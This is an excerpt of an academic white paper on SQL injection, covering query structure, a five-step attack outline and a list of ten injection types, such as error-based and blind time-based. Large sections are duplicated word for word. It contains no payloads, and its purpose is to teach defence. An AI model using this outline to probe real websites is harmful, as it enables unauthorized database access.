By U.Chandrasekhar and Digvijay Singh
Abstract.
SQL Injections pose lot of risk to ecommerce sites as well as web pages that are database driven. There are various kinds of SQL injections. For each type there are different ways of interpreting the errors and cracking the query for exploiting the website. This paper discusses how to understand the errors for each type of injection. This will help us find exhaustive solutions to every kind of injection strategy. This paper also suggests few remedies to defend and prevent such attacks.
SQL Injections pose lot of risk to ecommerce sites as well as web pages that are database driven. There are various kinds of SQL injections. For each type there are different ways of interpreting the errors and cracking the query for exploiting the website. This paper discusses how to understand the errors for each type of injection. This will help us find exhaustive solutions to every kind of injection strategy. This paper also suggests few remedies to defend and prevent such attacks.
Introduction
SQL Injections are web attacks used by hackers, where in they alter the structure of the SQL query[3,5] in the web URL and gain unauthorized access to the back end database. We are depending on internet for our daily needs like E- Commerce, E-Learning, social networking and online billing etc. Huge amount of confidential data is present in databases of various websites, including our login details. Hence the need to build a secure web application is of utmost importance for any developer. Information security deals with Confidentiality, availability, Integrity of stored data. The details we enter through the website, form part of the SQL query[7] used to modify the back end details. This query is visible to end users in GET method[5] of passing information from front end to back end. An attacker studies and understands the behaviour of the SQL query by looking at various errors the web page may throw, through experimentation. With such an understanding, he is able to modify the query in URL to gain unauthorized access to back end data tables. This is known as SQL Injection Attacks (SQLIAS)[6,8,10]. Such attacks are possible due to design flaws in the web applications. The damage can range from small scale to complete system failure. With little care and foresight, these attacks can be prevented or defended. Sql attacks occur between Presentation layer and CGI layer. According to the ANSI SQL standard, the SQL elements can be divided into following categories
Blank space: Includes space characters, tabs, carriage returns, line feeds, etc.
– Comments: Single-line comment, lead by comment symbol ”–.
– Multiple-line comment, cited by a pair of comment symbol ”/*” and ”*/”.
– Key words: Such as ”SELECT”, ”INSERT”, ”GRANT”, etc.
– Punctuations: Used to separate SQL queries, also used in some mathematical operations, like ”=”, ”(”, ”;”, etc.
– Identifier: Used to specify database name, variable name, etc.
– Data: Includes all kinds of data used in SQL standard queries such as strings, integers, numbers, dates, etc.
VARIOUS KINDS OF SQL INJECTIONS
TSQLIAS are carried out in following five steps.
– Enumerate the application behaviours.
– Fuzz the application with bogus data with the goal of crashing the applica- tion.
– Try to control the injection point by guessing the query used in the backend.
– Extract the data or schema information from the back end database.
– Manipulate the data or schema to hackers need.
The paper shows how the following SQL Injection[7] errors are handled when GET method[6,8] of submission is used
1. Error based - single quotes 2. Error based - integer based 3. Error based - single quotes with twist - string 4. Error based - Double quotes - string 5. Double injection - single quotes - string 6. Dump into outfile - string 7. Double injection - Double quotes - string 8. Blind - Boolean Based - single quotes 9. Blind - Time based - Single quotes 10. Blind - Time based - Double quotes
SQL Injections are web attacks used by hackers, where in they alter the structure of the SQL query[3,5] in the web URL and gain unauthorized access to the back end database. We are depending on internet for our daily needs like E- Commerce, E-Learning, social networking and online billing etc. Huge amount of confidential data is present in databases of various websites, including our login details. Hence the need to build a secure web application is of utmost importance for any developer. Information security deals with Confidentiality, availability, Integrity of stored data. The details we enter through the website, form part of the SQL query[7] used to modify the back end details. This query is visible to end users in GET method[5] of passing information from front end to back end. An attacker studies and understands the behaviour of the SQL query by looking at various errors the web page may throw, through experimentation. With such an understanding, he is able to modify the query in URL to gain unauthorized access to back end data tables. This is known as SQL Injection Attacks (SQLIAS)[6,8,10]. Such attacks are possible due to design flaws in the web applications. The damage can range from small scale to complete system failure. With little care and foresight, these attacks can be prevented or defended. Sql attacks occur between Presentation layer and CGI layer. According to the ANSI SQL standard, the SQL elements can be divided into following categories
Blank space: Includes space characters, tabs, carriage returns, line feeds, etc.
– Comments: Single-line comment, lead by comment symbol ”–.
– Multiple-line comment, cited by a pair of comment symbol ”/*” and ”*/”.
– Key words: Such as ”SELECT”, ”INSERT”, ”GRANT”, etc.
– Punctuations: Used to separate SQL queries, also used in some mathematical operations, like ”=”, ”(”, ”;”, etc.
– Identifier: Used to specify database name, variable name, etc.
– Data: Includes all kinds of data used in SQL standard queries such as strings, integers, numbers, dates, etc.
VARIOUS KINDS OF SQL INJECTIONS
TSQLIAS are carried out in following five steps.
– Enumerate the application behaviours.
– Fuzz the application with bogus data with the goal of crashing the applica- tion.
– Try to control the injection point by guessing the query used in the backend.
– Extract the data or schema information from the back end database.
– Manipulate the data or schema to hackers need.
The paper shows how the following SQL Injection[7] errors are handled when GET method[6,8] of submission is used
1. Error based - single quotes 2. Error based - integer based 3. Error based - single quotes with twist - string 4. Error based - Double quotes - string 5. Double injection - single quotes - string 6. Dump into outfile - string 7. Double injection - Double quotes - string 8. Blind - Boolean Based - single quotes 9. Blind - Time based - Single quotes 10. Blind - Time based - Double quotes
For the entire white paper
| understanding_query_vulnerabilities_during_sql_injection_1.pdf |
Copyright @Digvijay Singh, VIT Vellore. Any unauthorized reprint or use of this material is prohibited.
RSS Feed